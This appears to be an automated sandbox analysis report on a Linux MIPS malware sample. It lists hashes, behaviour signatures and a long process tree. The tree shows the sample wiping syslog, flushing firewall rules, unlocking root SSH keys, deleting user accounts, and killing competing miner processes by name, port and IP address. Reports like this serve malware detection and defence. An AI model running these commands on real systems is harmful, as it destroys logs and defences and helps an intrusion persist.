Analysis
-
max time kernel
92s -
max time network
124s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
-
submitted
29-09-2024 11:33
General
-
Target
fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118
-
Size
27KB
-
MD5
fe70c19936ef32efb00f3c75ea90e701
-
SHA1
461514742ae77741e53efb6975ffd8d3db264c92
-
SHA256
7f0e07d0e5f7af973ab0f2768f06c00efb7f37da49fb6939df547d076e2c62d5
-
SHA512
dad1271c0984f3120dc0c35725212fdccf707b4c3e5ecc6b1fe9e5ba95b295398d17fdac46c767375268fb1577128d23aa519ebfabc881a3b11e78de1b6a8f4b
-
SSDEEP
384:G7pQQwQHDf6jlpTWg3vMGQiKMvh/4Qdre21jT58vKpG2Y0orcfKLUv0KZnNEVdeD:G7JoFNcDvFLcIwgiYq0xzBWjzr2W
Score
7/10
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 1 IoCs
-
Flushes firewall rules 1 TTPs 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
-
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
-
Attempts to change immutable files 64 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
-
Creates/modifies Cron job 1 TTPs 22 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
-
Disables AppArmor 16 IoCs
Disables AppArmor security module.
-
Disables SELinux 1 TTPs 1 IoCs
Disables SELinux security module.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Write file to user bin folder 2 IoCs
-
Reads CPU attributes 1 TTPs 64 IoCs
-
Enumerates kernel/hardware configuration 1 TTPs 8 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Process Discovery 1 TTPs 64 IoCs
Adversaries may try to discover information about running processes.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118/tmp/fe70c19936ef32efb00f3c75ea90e701_JaffaCakes1181⤵
- Writes file to tmp directory
-
/bin/rmrm -rf /var/log/syslog2⤵
-
-
/usr/bin/chattrchattr -iua /tmp/2⤵
-
-
/usr/bin/chattrchattr -iua /var/tmp/2⤵
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
-
-
/usr/bin/sudosudo sysctl "kernel.nmi_watchdog=0"2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
-
/usr/sbin/sendmailsendmail -t3⤵
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1suqJW-0000Bx-7D4⤵
-
-
-
/usr/sbin/sendmailsendmail -t3⤵
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1suqJW-0000C1-5z4⤵
-
-
-
/sbin/sysctlsysctl "kernel.nmi_watchdog=0"3⤵
-
-
-
/usr/sbin/userdeluserdel akay2⤵
-
-
/usr/sbin/userdeluserdel vfinder2⤵
-
-
/usr/bin/chattrchattr -iae /root/.ssh/2⤵
- Attempts to change immutable files
-
-
/usr/bin/chattrchattr -iae /root/.ssh/authorized_keys2⤵
-
-
/bin/rmrm -rf "/tmp/addres*"2⤵
-
-
/bin/rmrm -rf "/tmp/walle*"2⤵
-
-
/bin/rmrm -rf /tmp/keys2⤵
-
-
/bin/grepgrep -i "[a]liyun"2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep -i "[y]unjing"2⤵
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep 185.71.65.2382⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/bin/grepgrep 140.82.52.872⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep :4432⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/bin/grepgrep :232⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :4432⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :1432⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :22222⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :33332⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :33892⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :44442⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :55552⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :66662⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :66652⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :66672⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :77772⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :84442⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :33472⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :144442⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :144332⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v -2⤵
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
-
/usr/bin/awkawk "{print \$7}"2⤵
-
-
/bin/grepgrep :135312⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep "sleep 60"2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep ./crun2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{if(\$3>80.0) print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep -vw salt-minions2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep :33332⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep :55552⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep "kworker -c\\"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep log_2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep systemten2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/usr/local/sbin/killkill -9 103⤵
-
-
/usr/local/bin/killkill -9 103⤵
-
-
/usr/sbin/killkill -9 103⤵
-
-
/usr/bin/killkill -9 103⤵
-
-
/sbin/killkill -9 103⤵
-
-
/bin/killkill -9 103⤵
-
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep netns2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep voltuned2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep darwin2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/dl2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/ddg2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/pprt2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/ppol2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep "/tmp/65ccE*"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep "/tmp/jmx*"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep "/tmp/2Ne80*"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep IOFoqIgyC0zmf2UR2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 45.76.122.922⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/bin/psps aux2⤵
-
-
/bin/grepgrep 51.38.191.1782⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep 51.15.56.1612⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 86s.jpg2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep aGTSGJJp2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep nMrfmnRa2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep PuNY5tm22⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep I0r8Jyyt2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep AgdgACUD2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep uiZvwxG82⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep hahwNEdB2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
-
-
/bin/grepgrep BtwXn5qH2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep 3XEzey2T2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep t2tKrCSZ2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep HD7fcBgg2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep zXcDajSs2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 3lmigMo2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep AkMK4A22⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep AJ2AkKe2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep HiPxCJRS2⤵
- System Network Configuration Discovery
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep http_0xCC0302⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep http_0xCC0312⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep http_0xCC0322⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep http_0xCC0332⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep C4iLM4L2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep aziplcr72qjhzvin2⤵
- System Network Configuration Discovery
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /boot/vmlinuz2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep i4b503a52cc52⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep dgqtrcst23rtdi3ldqk322j22⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 2g0uv7npuhrlatd2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep nqscheduler2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep rkebbwgqpl4npmm2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "\$3>10.0{print \$2}"2⤵
-
-
/bin/grepgrep "]"2⤵
-
-
/bin/grepgrep -v aux2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 2fhtu70teuhtoh78jc5s2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 0kwti6ut420t2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 44ct7udt0patws3agkdfqnjm2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/bin/grepgrep -v _2⤵
-
-
/usr/bin/awkawk "length(\$11)>19{print \$2}"2⤵
-
-
/bin/grepgrep -v -2⤵
-
-
/bin/grepgrep -v /2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep "\\[^"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep rsync2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep watchd0g2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/egrepegrep "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/local/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/usr/local/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/usr/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/usr/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 158.69.133.18:82202⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/java2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Reads runtime system information
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep gitee.com2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /tmp/java2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 104.248.4.1622⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep 89.35.39.782⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep /dev/shm/z3.sh2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/bin/grepgrep kthrotlds2⤵
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/psps aux2⤵
- Process Discovery
-
-
/bin/grepgrep -v grep2⤵
-
-
/bin/grepgrep ksoftirqds2⤵
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
